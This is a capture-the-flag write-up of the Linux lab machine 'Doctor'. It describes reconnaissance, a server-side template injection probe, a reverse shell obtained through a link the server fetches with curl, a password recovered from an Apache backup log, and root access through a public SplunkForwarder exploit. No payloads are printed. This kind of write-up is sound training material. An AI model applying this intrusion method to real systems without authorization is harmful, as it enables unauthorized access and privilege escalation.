Summary
Doctor is an easy Linux box created by egotisticalSW. Initial foothold is discovered by fuzzing the ‘New Message’ form in the Doctor Secure Messaging page. A reverse shell can be spawned by performing Server Side Template Injection. Lateral movement to user ‘shaun’ is done by finding his password in a backup file. Root privileges are granted after exploiting SplunkForwarder which is vulnerable to remote code execution/local privilege escalation.
Reconnaissance
Nmap discovered 3 open ports, 22(ssh), 80(http), and 8089(Splunkd).
Visiting the HTTP service on port 80 displays a page for health care services. Clicking the contact button on the top right shows ‘doctors.htb’ as domain.
Adding doctors.htb to hosts file gives us access to a login page.
I tried common credentials but was unsuccessful. Clicking Sign Up Now will let us register for a user.
Upon logging in, we can see an empty page to what seems like a secure messaging application.
Checking the source code shows a directory called /archive which is empty.
Server-Side Template Injection
Clicking New Message lets us create a new post. Fuzzing the form with {{7*7}} checks if it is vulnerable to Server Side Template Injection.
It did not evaluate the injected string on the home page but after checking /archive, we can see that it was evaluated.
Viewing the source code was needed for the evaluated code to be visible.
I did not manage to successfully exploit the vulnerability to perform code execution so I tried other things. I noticed that if a link is provided, the server sends a request to the link with curl.
After a lot of fuzzing, I finally found a payload that will spawn a reverse shell.
Finding Password in Logs
After enumerating files and logs, I managed to find something interesting. In /var/log/apache2/backup, a resetpassword post request was made and ‘Guitar123’ was seen on the email parameter. Since it doesn’t seem to be an email, someone might have typed it on the email instead of the password field.
I tried switching to shaun user and it worked by supplying the discovered password.
Privilege Escalation
Enumerating further reveals splunkforwarder in /opt directory. Looking up the version leads us to a github repository for remote code execution/local privilege escalation.
After running the exploit with the necessary information provided, we are able to get a reverse shell as root.
That’s it for Doctor, thank you for reading, and have a good day all!
